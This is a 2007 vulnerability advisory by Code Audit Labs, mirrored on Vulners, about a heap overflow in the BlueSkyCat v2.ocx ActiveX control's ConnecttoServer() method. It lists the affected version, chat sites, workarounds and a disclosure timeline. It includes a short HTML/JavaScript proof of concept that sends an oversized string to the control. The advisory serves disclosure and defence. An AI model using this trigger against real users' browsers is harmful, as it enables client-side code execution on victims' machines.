Vulners
Lucene search
CAL-20070730-1.txt
🗓️ 31 Jul 2007 00:00:00Reported by Code Audit LabsType 
packetstorm🔗 packetstormsecurity.com👁 32 Views
` CAL-20070730-1 BlueSkyCat ActiveX Remote Heap Overflow vulnerability
BACKGROUND:
===========
BlueSkychat is a professional voice and video chat software widely used
by large chat websites in china.
DESCRIPTION:
============
Code Audit Labs Code Audit for BlueSkyCat ActiveX Control and discovered
a vulnerability .
Remote exploitation of a buffer overflow in an ActiveX control
distributed
with Bluesky.cn could allow for the execution of arbitrary code.
When Blueskychat are installed, they register the following ActiveX
control on the system:
ProgId: V2.V2Ctrl.1
ClassId: 2EA6D939-4445-43F1-A12B-8CB3DDA8B855
File: v2.ocx
This control contains a buffer overflow in its ConnecttoServer() method.
This is a clent side vulnerability. So the clients of following chat
servers which install the affected BlueSkyCat software are affected.
bliao http://www.bliao.com
qqliao http://www.qqliao.com
7liao http://www.7liao.com
haoliao http://www.haoliao.net
51liao http://chat.51liao.net
heshang http://www.heshang.net
xicn http://vchat.xicn.net
CN104 http://www.cn104.com
liao-tian http://www.liao-tian.com
aliao http://www.aliao.net
kuailiao http://www.kuailiao.com
mtliao http://www.mtliao.com
pj0427 http://www.pj0427.com
uighur http://chat.uighur.cn
wmliao http://www.wmliao.com
CVE:
====
We request a CVE number to assign to this vulnerability.
Affected version:
================
v2.ocx version 8.1.2.0 and prior
vendor:
=======
BlueSky http://www.bluesky.cn/
POC:
========
<html>
<head>
<OBJECT ID="com" CLASSID="CLSID:{2EA6D939-4445-43F1-A12B-8CB3DDA8B855}">
</OBJECT>
</head>
<body>
<SCRIPT language="javascript">
function ClickForRunCalc()
{
var heapSprayToAddress = 0x0d0d0d0d;
var payLoadCode = "A" ;
while (payLoadCode.length <= 10000) payLoadCode+='A';
com.ConnecttoServer("1",payLoadCode,"3","4","5");
}
</script>
<button onclick="javascript:ClickForRunCalc();">ClickForRunCalc</button>
</body>
</html>
Code Audit Labs Suggestion
==========================
for vendor:
Do a full coverage Code Audit or Code Review
for client:
The following workarounds are available for this vulnerability:
* Disable Active Scripting
* Unregister the vulnerable control
* Set the killbit for the vulnerable control
* or update the software from http://www.bluesky.cn
DISCLOSURE TIMELINE:
====================
1: 2007-07-29 notice vendor (mail to [email protected])
2: 2007-07-29 the vendor reply "thank,had fixed it".
3: 2007-07-30 we check it out, in fact,the websites which install the
software did not almost all be updated,send mail to vendor again.
4: 2007-07-31 release this report
About Us:
=========
Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs:" You create value for customer,We protect your value"
http://www.VulnHunt.com
Original LINK:
==============
1:
http://www.vulnhunt.com/advisories/CAL-20070730-1_BlueSkyCat_v2.ocx_ActiveX_remote_heap_overflow_vulnerability_en.txt
2: http://CodeAudit.blogspot.com
EOF
--
Code Audit Labs
http://www.vulnhunt.com/
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4